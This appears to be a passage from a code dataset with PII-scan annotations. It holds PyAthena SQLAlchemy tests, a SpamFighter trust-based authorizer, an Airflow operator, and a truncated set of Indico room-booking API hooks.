lambda: Table(""this_does_not_exist"", MetaData(bind=engine), autoload=True),
)
self.assertRaises(
NoSuchTableError,
lambda: Table(
""this_does_not_exist"",
MetaData(bind=engine),
schema=""also_does_not_exist"",
autoload=True,
),
)
@with_engine()
def test_reflect_table(self, engine, conn):
one_row = Table(""one_row"", MetaData(bind=engine), autoload=True)
self.assertEqual(len(one_row.c), 1)
self.assertIsNotNone(one_row.c.number_of_rows)
@with_engine()
def test_reflect_table_with_schema(self, engine, conn):
one_row = Table(""one_row"", MetaData(bind=engine), schema=SCHEMA, autoload=True)
self.assertEqual(len(one_row.c), 1)
self.assertIsNotNone(one_row.c.number_of_rows)
@with_engine()
def test_reflect_table_include_columns(self, engine, conn):
one_row_complex = Table(""one_row_complex"", MetaData(bind=engine))
version = float(
re.search(r""^([\d]+\.[\d]+)\..+"", sqlalchemy.__version__).group(1)
)
if version <= 1.2:
engine.dialect.reflecttable(
conn, one_row_complex, include_columns=[""col_int""], exclude_columns=[]
)
elif version == 1.3:
# https://docs.sqlalchemy.org/en/13/changelog/changelog_13.html
# #PI:KEY
engine.dialect.reflecttable(
conn,
one_row_complex,
include_columns=[""col_int""],
exclude_columns=[],
resolve_fks=True,
)
else: # version >= 1.4
# https://docs.sqlalchemy.org/en/14/changelog/changelog_14.html
# #change-0215fae622c01f9409eb1ba2754f4792
# https://docs.sqlalchemy.org/en/14/core/reflection.html
# #sqlalchemy.engine.reflection.Inspector.reflect_table
insp = sqlalchemy.inspect(engine)
insp.reflect_table(
one_row_complex,
include_columns=[""col_int""],
exclude_columns=[],
resolve_fks=True,
)
self.assertEqual(len(one_row_complex.c), 1)
self.assertIsNotNone(one_row_complex.c.col_int)
self.assertRaises(AttributeError, lambda: one_row_complex.c.col_tinyint)
@with_engine()
def test_unicode(self, engine, conn):
unicode_str = ""密林""
one_row = Table(""one_row"", MetaData(bind=engine))
returned_str = sqlalchemy.select(
[expression.bindparam(""あまぞん"", unicode_str, type_=String())],
from_obj=one_row,
).scalar()
self.assertEqual(returned_str, unicode_str)
@with_engine()
def test_reflect_schemas(self, engine, conn):
insp = sqlalchemy.inspect(engine)
schemas = insp.get_schema_names()
self.assertIn(SCHEMA, schemas)
self.assertIn(""default"", schemas)
@with_engine()
def test_get_table_names(self, engine, conn):
meta = MetaData()
meta.reflect(bind=engine)
print(meta.tables)
self.assertIn(""one_row"", meta.tables)
self.assertIn(""one_row_complex"", meta.tables)
insp = sqlalchemy.inspect(engine)
self.assertIn(
""many_rows"",
insp.get_table_names(schema=SCHEMA),
)
@with_engine()
def test_has_table(self, engine, conn):
insp = sqlalchemy.inspect(engine)
self.assertTrue(insp.has_table(""one_row"", schema=SCHEMA))
self.assertFalse(insp.has_table(""this_table_does_not_exist"", schema=SCHEMA))
@with_engine()
def test_get_columns(self, engine, conn):
insp = sqlalchemy.inspect(engine)
actual = insp.get_columns(table_name=""one_row"", schema=SCHEMA)[0]
self.assertEqual(actual[""name""], ""number_of_rows"")
self.assertTrue(isinstance(actual[""type""], INTEGER))
self.assertTrue(actual[""nullable""])
self.assertIsNone(actual[""default""])
self.assertEqual(actual[""ordinal_position""], 1)
self.assertIsNone(actual[""comment""])
@with_engine()
def test_char_length(self, engine, conn):
one_row_complex = Table(""one_row_complex"", MetaData(bind=engine), autoload=True)
result = (
sqlalchemy.select(
[sqlalchemy.func.char_length(one_row_complex.c.col_string)]
)
.execute()
.scalar()
)
self.assertEqual(result, len(""a string""))
@with_engine()
def test_reflect_select(self, engine, conn):
one_row_complex = Table(""one_row_complex"", MetaData(bind=engine), autoload=True)
self.assertEqual(len(one_row_complex.c), 15)
self.assertIsInstance(one_row_complex.c.col_string, Column)
rows = one_row_complex.select().execute().fetchall()
self.assertEqual(len(rows), 1)
self.assertEqual(
list(rows[0]),
[
True,
127,
32767,
2147483647,
9223372036854775807,
0.5,
0.25,
""a string"",
datetime(2017, 1, 1, 0, 0, 0),
date(2017, 1, 2),
b""123"",
""[1, 2]"",
""{1=2, 3=4}"",
""{a=1, b=2}"",
Decimal(""0.1""),
],
)
self.assertIsInstance(one_row_complex.c.col_boolean.type, BOOLEAN)
self.assertIsInstance(one_row_complex.c.col_tinyint.type, INTEGER)
self.assertIsInstance(one_row_complex.c.col_smallint.type, INTEGER)
self.assertIsInstance(one_row_complex.c.col_int.type, INTEGER)
self.assertIsInstance(one_row_complex.c.col_bigint.type, BIGINT)
self.assertIsInstance(one_row_complex.c.col_float.type, FLOAT)
self.assertIsInstance(one_row_complex.c.col_double.type, FLOAT)
self.assertIsInstance(one_row_complex.c.col_string.type, type(STRINGTYPE))
self.assertIsInstance(one_row_complex.c.col_timestamp.type, TIMESTAMP)
self.assertIsInstance(one_row_complex.c.col_date.type, DATE)
self.assertIsInstance(one_row_complex.c.col_binary.type, BINARY)
self.assertIsInstance(one_row_complex.c.col_array.type, type(STRINGTYPE))
self.assertIsInstance(one_row_complex.c.col_map.type, type(STRINGTYPE))
self.assertIsInstance(one_row_complex.c.col_struct.type, type(STRINGTYPE))
self.assertIsInstance(one_row_complex.c.col_decimal.type, DECIMAL)
@with_engine()
def test_reserved_words(self, engine, conn):
""""""Presto uses double quotes, not backticks""""""
fake_table = Table(
""select"", MetaData(bind=engine), Column(""current_timestamp"", STRINGTYPE)
)
query = str(fake_table.select(fake_table.c.current_timestamp == ""a""))
self.assertIn('""select""', query)
self.assertIn('""current_timestamp""', query)
self.assertNotIn(""`select`"", query)
self.assertNotIn(""`current_timestamp`"", query)
@with_engine()
def test_retry_if_data_catalog_exception(self, engine, conn):
dialect = engine.dialect
exc = OperationalError(
"""", None, ""Database does_not_exist not found. Please check your query.""
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, ""does_not_exist"", ""does_not_exist""
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, ""does_not_exist"", ""this_does_not_exist""
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, ""this_does_not_exist"", ""does_not_exist""
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, ""this_does_not_exist"", ""this_does_not_exist""
)
)
exc = OperationalError(
"""", None, ""Namespace does_not_exist not found. Please check your query.""
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, ""does_not_exist"", ""does_not_exist""
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, ""does_not_exist"", ""this_does_not_exist""
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, ""this_does_not_exist"", ""does_not_exist""
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, ""this_does_not_exist"", ""this_does_not_exist""
)
)
exc = OperationalError(
"""", None, ""Table does_not_exist not found. Please check your query.""
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, ""does_not_exist"", ""does_not_exist""
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, ""does_not_exist"", ""this_does_not_exist""
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, ""this_does_not_exist"", ""does_not_exist""
)
)
self.assertTrue(
dialect._retry_if_data_catalog_exception(
exc, ""this_does_not_exist"", ""this_does_not_exist""
)
)
exc = OperationalError("""", None, ""foobar."")
self.assertTrue(
dialect._retry_if_data_catalog_exception(exc, ""foobar"", ""foobar"")
)
exc = ProgrammingError(
"""", None, ""Database does_not_exist not found. Please check your query.""
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, ""does_not_exist"", ""does_not_exist""
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, ""does_not_exist"", ""this_does_not_exist""
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, ""this_does_not_exist"", ""does_not_exist""
)
)
self.assertFalse(
dialect._retry_if_data_catalog_exception(
exc, ""this_does_not_exist"", ""this_does_not_exist""
)
)
@with_engine()
def test_get_column_type(self, engine, conn):
dialect = engine.dialect
self.assertEqual(dialect._get_column_type(""boolean""), ""boolean"")
self.assertEqual(dialect._get_column_type(""tinyint""), ""tinyint"")
self.assertEqual(dialect._get_column_type(""smallint""), ""smallint"")
self.assertEqual(dialect._get_column_type(""integer""), ""integer"")
self.assertEqual(dialect._get_column_type(""bigint""), ""bigint"")
self.assertEqual(dialect._get_column_type(""real""), ""real"")
self.assertEqual(dialect._get_column_type(""double""), ""double"")
self.assertEqual(dialect._get_column_type(""varchar""), ""varchar"")
self.assertEqual(dialect._get_column_type(""timestamp""), ""timestamp"")
self.assertEqual(dialect._get_column_type(""date""), ""date"")
self.assertEqual(dialect._get_column_type(""varbinary""), ""varbinary"")
self.assertEqual(dialect._get_column_type(""array(integer)""), ""array"")
self.assertEqual(dialect._get_column_type(""map(integer, integer)""), ""map"")
self.assertEqual(dialect._get_column_type(""row(a integer, b integer)""), ""row"")
self.assertEqual(dialect._get_column_type(""decimal(10,1)""), ""decimal"")
@with_engine()
def test_contain_percents_character_query(self, engine, conn):
select = sqlalchemy.sql.text(
""""""
SELECT date_parse('20191030', '%Y%m%d')
""""""
)
table_expression = sqlalchemy.sql.selectable.TextAsFrom(select, []).cte()
query = sqlalchemy.select([""*""]).select_from(table_expression)
result = engine.execute(query)
self.assertEqual(result.fetchall(), [(datetime(2019, 10, 30),)])
query_with_limit = (
sqlalchemy.sql.select([""*""]).select_from(table_expression).limit(1)
)
result_with_limit = engine.execute(query_with_limit)
self.assertEqual(result_with_limit.fetchall(), [(datetime(2019, 10, 30),)])
@with_engine()
def test_query_with_parameter(self, engine, conn):
select = sqlalchemy.sql.text(
""""""
SELECT :word
""""""
)
table_expression = sqlalchemy.sql.selectable.TextAsFrom(select, []).cte()
query = sqlalchemy.select([""*""]).select_from(table_expression)
result = engine.execute(query, word=""cat"")
self.assertEqual(result.fetchall(), [(""cat"",)])
query_with_limit = (
sqlalchemy.select([""*""]).select_from(table_expression).limit(1)
)
result_with_limit = engine.execute(query_with_limit, word=""cat"")
self.assertEqual(result_with_limit.fetchall(), [(""cat"",)])
@with_engine()
def test_contain_percents_character_query_with_parameter(self, engine, conn):
select1 = sqlalchemy.sql.text(
""""""
SELECT date_parse('20191030', '%Y%m%d'), :word
""""""
)
table_expression1 = sqlalchemy.sql.selectable.TextAsFrom(select1, []).cte()
query1 = sqlalchemy.select([""*""]).select_from(table_expression1)
result1 = engine.execute(query1, word=""cat"")
self.assertEqual(result1.fetchall(), [(datetime(2019, 10, 30), ""cat"")])
query_with_limit1 = (
sqlalchemy.select([""*""]).select_from(table_expression1).limit(1)
)
result_with_limit1 = engine.execute(query_with_limit1, word=""cat"")
self.assertEqual(
result_with_limit1.fetchall(), [(datetime(2019, 10, 30), ""cat"")]
)
select2 = sqlalchemy.sql.text(
""""""
SELECT col_string, :param FROM one_row_complex
WHERE col_string LIKE 'a%' OR col_string LIKE :param
""""""
)
table_expression2 = sqlalchemy.sql.selectable.TextAsFrom(select2, []).cte()
query2 = sqlalchemy.select([""*""]).select_from(table_expression2)
result2 = engine.execute(query2, param=""b%"")
self.assertEqual(result2.fetchall(), [(""a string"", ""b%"")])
query_with_limit2 = (
sqlalchemy.select([""*""]).select_from(table_expression2).limit(1)
)
result_with_limit2 = engine.execute(query_with_limit2, param=""b%"")
self.assertEqual(result_with_limit2.fetchall(), [(""a string"", ""b%"")])
@with_engine()
def test_nan_checks(self, engine, conn):
dialect = engine.dialect
self.assertFalse(dialect._is_nan(""string""))
self.assertFalse(dialect._is_nan(1))
self.assertTrue(dialect._is_nan(float(""nan"")))
@with_engine()
def test_to_sql(self, engine, conn):
# TODO pyathena.error.OperationalError: SYNTAX_ERROR: line 1:305:
# Column 'foobar' cannot be resolved.
# def _format_bytes(formatter, escaper, val):
# return val.decode()
table_name = ""to_sql_{0}"".format(str(uuid.uuid4()).replace(""-"", """"))
df = pd.DataFrame(
{
""col_int"": np.int32([1]),
""col_bigint"": np.int64([12345]),
""col_float"": np.float32([1.0]),
""col_double"": np.float64([1.2345]),
""col_string"": [""a""],
""col_boolean"": np.bool_([True]),
""col_timestamp"": [datetime(2020, 1, 1, 0, 0, 0)],
""col_date"": [date(2020, 12, 31)],
# ""col_binary"": ""foobar"".encode(),
}
)
# Explicitly specify column order
df = df[
[
""col_int"",
""col_bigint"",
""col_float"",
""col_double"",
""col_string"",
""col_boolean"",
""col_timestamp"",
""col_date"",
# ""col_binary"",
]
]
df.to_sql(
table_name,
engine,
schema=SCHEMA,
index=False,
if_exists=""replace"",
method=""multi"",
)
table = Table(table_name, MetaData(bind=engine), autoload=True)
self.assertEqual(
table.select().execute().fetchall(),
[
(
1,
12345,
1.0,
1.2345,
""a"",
True,
datetime(2020, 1, 1, 0, 0, 0),
date(2020, 12, 31),
# ""foobar"".encode(),
)
],
)
@with_engine(verify=""false"")
def test_conn_str_verify(self, engine, conn):
kwargs = conn.connection._kwargs
self.assertFalse(kwargs[""verify""])
@with_engine(duration_seconds=""1800"")
def test_conn_str_duration_seconds(self, engine, conn):
kwargs = conn.connection._kwargs
self.assertEqual(kwargs[""duration_seconds""], 1800)
@with_engine(poll_interval=""5"")
def test_conn_str_poll_interval(self, engine, conn):
self.assertEqual(conn.connection.poll_interval, 5)
@with_engine(kill_on_interrupt=""false"")
def test_conn_str_kill_on_interrupt(self, engine, conn):
self.assertFalse(conn.connection.kill_on_interrupt)
",20066,"[['URL', 'urllib.pa'], ['LOCATION', 'TestCase'], ['PERSON', 'quote_plus(ENV.s3_staging_dir'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'one_row_complex'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['PERSON', 'meta.tables'], ['PERSON', 'meta.tables'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'datetime(2017'], ['PERSON', 'Decimal(""0.1'], ['LOCATION', 'conn'], ['PERSON', 'fake_table'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['PERSON', 'TextAsFrom(select'], ['LOCATION', 'conn'], ['PERSON', 'TextAsFrom(select'], ['LOCATION', 'conn'], ['PERSON', 'select1'], ['PERSON', 'query1'], ['PERSON', 'sqlalchemy.select([""*""]).select_from(table_expression1'], ['PERSON', 'query2 ='], ['PERSON', 'result2'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['PERSON', 'TODO'], ['DATE_TIME', '12'], ['DATE_TIME', '12'], ['LOCATION', 'conn'], ['NRP', 'kwargs'], ['LOCATION', 'conn'], ['NRP', 'kwargs'], ['LOCATION', 'conn'], ['LOCATION', 'conn'], ['URL', 'https://github.com/dropbox/PyHive/blob/master/pyhive/tests/sqlalchemy_test_case.py'], ['URL', 'https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_hive.py'], ['URL', 'https://github.com/dropbox/PyHive/blob/master/pyhive/tests/test_sqlalchemy_presto.py'], ['URL', 'https://docs.sqlalchemy.org/en/13/changelog/changelog_13.html'], ['URL', 'https://docs.sqlalchemy.org/en/14/changelog/changelog_14.html'], ['URL', 'https://docs.sqlalchemy.org/en/14/core/reflection.html'], ['URL', 'sqlalchemy.sql.sc'], ['URL', 'tests.co'], ['URL', '.amazonaws.com'], ['URL', 'str.fo'], ['URL', 'ENV.re'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'row.c.nu'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'row.c.nu'], ['URL', 're.se'], ['URL', 'engine.dialect.re'], ['URL', 'engine.dialect.re'], ['URL', 'sqlalchemy.engine.reflection.Inspector.re'], ['URL', 'sqlalchemy.in'], ['URL', 'insp.re'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'sqlalchemy.se'], ['URL', 'expression.bi'], ['URL', 'self.as'], ['URL', 'sqlalchemy.in'], ['URL', 'insp.ge'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'meta.re'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'sqlalchemy.in'], ['URL', 'self.as'], ['URL', 'insp.ge'], ['URL', 'sqlalchemy.in'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'sqlalchemy.in'], ['URL', 'insp.ge'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'sqlalchemy.se'], ['URL', 'sqlalchemy.func.ch'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'complex.se'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 
'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'self.as'], ['URL', 'complex.c.co'], ['URL', 'table.se'], ['URL', 'table.c.cu'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.sql.se'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'sqlalchemy.se'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'pyathena.er'], ['URL', 'val.de'], ['URL', 'np.int'], ['URL', 'np.int'], ['URL', 'np.bo'], ['URL', 'df.to'], ['URL', 'self.as'], ['URL', 'table.se'], ['URL', 'conn.co'], ['URL', 'self.as'], ['URL', 'conn.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'conn.co'], ['URL', 'self.as'], ['URL', 'conn.connection.ki']]"
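The create_engine helper in the row above just formats a PyAthena SQLAlchemy URL. Here is a standalone sketch of the same connection string with placeholder region, schema, and staging bucket; note the s3_staging_dir value must be percent-encoded, as quote_plus does in the tests.

# Placeholders throughout: region, schema, and bucket are illustrative.
from sqlalchemy.engine import create_engine

engine = create_engine(
    'awsathena+rest://athena.us-west-2.amazonaws.com:443/default'
    '?s3_staging_dir=s3%3A%2F%2Fmy-bucket%2Fstaging%2F&compression=snappy'
)
print(engine.execute('SELECT 1').fetchall())  # [(1,)]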
64,"# -*- coding: utf-8 -*-
#
# SpamFighter, Copyright 2008, 2009 NetStream LLC (http://netstream.ru/, dummy@email.com)
#
# This file is part of SpamFighter.
#
# SpamFighter is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SpamFighter is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
## along with SpamFighter. If not, see <http://www.gnu.org/licenses/>.
#
""""""
Authorization module for partners without logins/passwords (trust-based).
""""""
from zope.interface import implements
from twisted.internet import defer
from spamfighter.interfaces import IPartner, IPartnerAuthorizer
from spamfighter.core.partner import PartnerAuthorizationFailedError
from spamfighter.core.domain import getDefaultDomain, BaseDomain
from spamfighter.plugin import loadPlugin, IDefaultDomainProvider
from spamfighter.utils import config
class NullPartner(object):
""""""
A partner authorized without a login/password (trust-based).
@ivar domain: the partner's root domain
@type domain: L{BaseDomain}
""""""
implements(IPartner)
def __init__(self):
""""""
Constructor.
""""""
domainProvider = loadPlugin(IDefaultDomainProvider, config.plugins.domain.null_partner_domain_provider)
self.domain = domainProvider.getDefaultDomain()
def rootDomain(self):
""""""
Get the partner's root domain.
@return: Deferred, the root domain (L{IDomain})
@rtype: C{twisted.internet.defer.Deferred}
""""""
return defer.succeed(self.domain)
class NullPartnerAuthorizer(object):
""""""
Authorization provider for partners without a login/password (trust-based).
In this situation access to SpamFighter is restricted by other means
(HTTP proxy, firewall).
@ivar partner: the single partner that provides all access
@type partner: L{NullPartner}
""""""
implements(IPartnerAuthorizer)
def __init__(self):
""""""
Constructor.
""""""
self.partner = NullPartner()
def authorize(self, partner_info):
""""""
Perform partner authorization.
@param partner_info: information about the partner
@return: Deferred, the partner (L{IPartner})
@rtype: C{twisted.internet.defer.Deferred}
""""""
if partner_info is not None:
return defer.fail(PartnerAuthorizationFailedError())
return defer.succeed(self.partner)
",2802,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', 'SpamFighter, Copyright 2008'], ['DATE_TIME', '2009'], ['PERSON', 'Модуль авторизации'], ['PERSON', 'паролей'], ['PERSON', 'Партнер'], ['PERSON', 'Получить'], ['NRP', '@rtype'], ['NRP', 'Провайдер'], ['LOCATION', 'партнеров без логина'], ['LOCATION', 'доступ'], ['PERSON', 'который обеспечивает весь'], ['NRP', 'self.partner'], ['PERSON', 'Выполнить авторизацию'], ['NRP', '@rtype'], ['URL', 'http://netstream.ru/,'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'zope.int'], ['URL', 'twisted.int'], ['URL', 'spamfighter.int'], ['URL', 'spamfighter.core.pa'], ['URL', 'spamfighter.core.do'], ['URL', 'spamfighter.pl'], ['URL', 'config.plugins.domain.nu'], ['URL', 'self.do'], ['URL', 'domainProvider.ge'], ['URL', 'twisted.internet.defer.De'], ['URL', 'defer.su'], ['URL', 'self.do'], ['URL', 'self.pa'], ['URL', 'twisted.internet.defer.De'], ['URL', 'defer.su'], ['URL', 'self.pa']]"
65,"""""""
.. module:: operators.dive_operator
:synopsis: DivePythonOperator for use with TaskRunner
.. moduleauthor:: Laura Lorenz dummy@email.com
.. moduleauthor:: Miriam Sexton dummy@email.com
""""""
from airflow.operators import PythonOperator
from .dive_operator import DiveOperator
class DivePythonOperator(DiveOperator, PythonOperator):
""""""
Python operator that can send along data dependencies to its callable.
Generates the callable by initializing its python object and calling its method.
""""""
def __init__(self, python_object, python_method=""run"", *args, **kwargs):
self.python_object = python_object
self.python_method = python_method
kwargs['python_callable'] = None
super(DivePythonOperator, self).__init__(*args, **kwargs)
def pre_execute(self, context):
context.update(self.op_kwargs)
context.update({""data_dependencies"": self.data_dependencies})
instantiated_object = self.python_object(context)
self.python_callable = getattr(instantiated_object, self.python_method)
",1075,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Laura Lorenz'], ['PERSON', 'Miriam Sexton'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ':: '], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'self.py'], ['URL', 'self.py'], ['URL', 'self.py'], ['URL', 'self.py'], ['URL', 'self.py']]"
66,"# -*- coding: utf-8 -*-
##
##
## This file is part of Indico
## Copyright (C) 2002 - 2013 European Organization for Nuclear Research (CERN)
##
## Indico is free software: you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation, either version 3 of the
## License, or (at your option) any later version.
##
## Indico is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Indico. If not, see <http://www.gnu.org/licenses/>.
from datetime import datetime
import icalendar
import pytz
from babel.dates import get_timezone
from sqlalchemy import Time, Date
from sqlalchemy.sql import cast
from werkzeug.datastructures import OrderedMultiDict, MultiDict
from indico.core.config import Config
from indico.core.db import db
from indico.core.errors import IndicoError
from indico.modules.rb.utils import rb_check_user_access
from indico.modules.rb.models.reservations import Reservation, RepeatMapping, RepeatFrequency, ConflictingOccurrences
from indico.modules.rb.models.locations import Location
from indico.modules.rb.models.rooms import Room
from indico.util.date_time import utc_to_server
from indico.web.http_api import HTTPAPIHook
from indico.web.http_api.metadata import ical
from indico.web.http_api.responses import HTTPAPIError
from indico.web.http_api.util import get_query_parameter
from MaKaC.authentication import AuthenticatorMgr
from MaKaC.common.info import HelperMaKaCInfo
class RoomBookingHookBase(HTTPAPIHook):
GUEST_ALLOWED = False
def _getParams(self):
super(RoomBookingHookBase, self)._getParams()
self._fromDT = utc_to_server(self._fromDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._fromDT else None
self._toDT = utc_to_server(self._toDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._toDT else None
self._occurrences = _yesno(get_query_parameter(self._queryParams, ['occ', 'occurrences'], 'no'))
def _hasAccess(self, aw):
return Config.getInstance().getIsRoomBookingActive() and rb_check_user_access(aw.getUser())
@HTTPAPIHook.register
class RoomHook(RoomBookingHookBase):
# e.g. /export/room/CERN/23.json
TYPES = ('room',)
RE = r'(?P<location>[\w\s]+)/(?P<idlist>\w+(?:-[\w\s]+)*)'  # group names restored from the _pathParams keys used below
DEFAULT_DETAIL = 'rooms'
MAX_RECORDS = {
'rooms': 500,
'reservations': 100
}
VALID_FORMATS = ('json', 'jsonp', 'xml')
def _getParams(self):
super(RoomHook, self)._getParams()
self._location = self._pathParams['location']
self._ids = map(int, self._pathParams['idlist'].split('-'))
if self._detail not in {'rooms', 'reservations'}:
raise HTTPAPIError('Invalid detail level: %s' % self._detail, 400)
def export_room(self, aw):
loc = Location.find_first(name=self._location)
if loc is None:
return
# Retrieve rooms
rooms_data = list(Room.get_with_data('vc_equipment', 'non_vc_equipment',
filters=[Room.id.in_(self._ids), Room.location_id == loc.id]))
# Retrieve reservations
reservations = None
if self._detail == 'reservations':
reservations = OrderedMultiDict(_export_reservations(self, True, False, [
Reservation.room_id.in_(x['room'].id for x in rooms_data)
]))
for result in rooms_data:
yield _serializable_room(result, reservations)
@HTTPAPIHook.register
class RoomNameHook(RoomBookingHookBase):
# e.g. /export/roomName/CERN/pump.json
GUEST_ALLOWED = True
TYPES = ('roomName', )
RE = r'(?P<location>[\w\s]+)/(?P<room_name>[\w\s\-]+)'
DEFAULT_DETAIL = 'rooms'
MAX_RECORDS = {
'rooms': 500
}
VALID_FORMATS = ('json', 'jsonp', 'xml')
def _getParams(self):
super(RoomNameHook, self)._getParams()
self._location = self._pathParams['location']
self._room_name = self._pathParams['room_name']
def _hasAccess(self, aw):
# Access to RB data (no reservations) is public
return Config.getInstance().getIsRoomBookingActive()
def export_roomName(self, aw):
loc = Location.find_first(name=self._location)
if loc is None:
return
search_str = '%{}%'.format(self._room_name)
rooms_data = Room.get_with_data('vc_equipment', 'non_vc_equipment',
filters=[Room.location_id == loc.id, Room.name.ilike(search_str)])
for result in rooms_data:
yield _serializable_room(result)
@HTTPAPIHook.register
class ReservationHook(RoomBookingHookBase):
# e.g. /export/reservation/CERN.json
TYPES = ('reservation', )
RE = r'(?P<loclist>[\w\s]+(?:-[\w\s]+)*)'
DEFAULT_DETAIL = 'reservations'
MAX_RECORDS = {
'reservations': 100
}
VALID_FORMATS = ('json', 'jsonp', 'xml', 'ics')
@property
def serializer_args(self):
return {'ical_serializer': _ical_serialize_reservation}
def _getParams(self):
super(ReservationHook, self)._getParams()
self._locations = self._pathParams['loclist'].split('-')
def export_reservation(self, aw):
locations = Location.find_all(Location.name.in_(self._locations))
if not locations:
return
for room_id, reservation in _export_reservations(self, False, True):
yield reservation
@HTTPAPIHook.register
class BookRoomHook(HTTPAPIHook):
PREFIX = 'api'
TYPES = ('roomBooking',)
RE = r'bookRoom'
GUEST_ALLOWED = False
VALID_FORMATS = ('json', 'xml')
COMMIT = True
HTTP_POST = True
def _getParams(self):
super(BookRoomHook, self)._getParams()
self._fromDT = utc_to_server(self._fromDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._fromDT else None
self._toDT = utc_to_server(self._toDT.astimezone(pytz.utc)).replace(tzinfo=None) if self._toDT else None
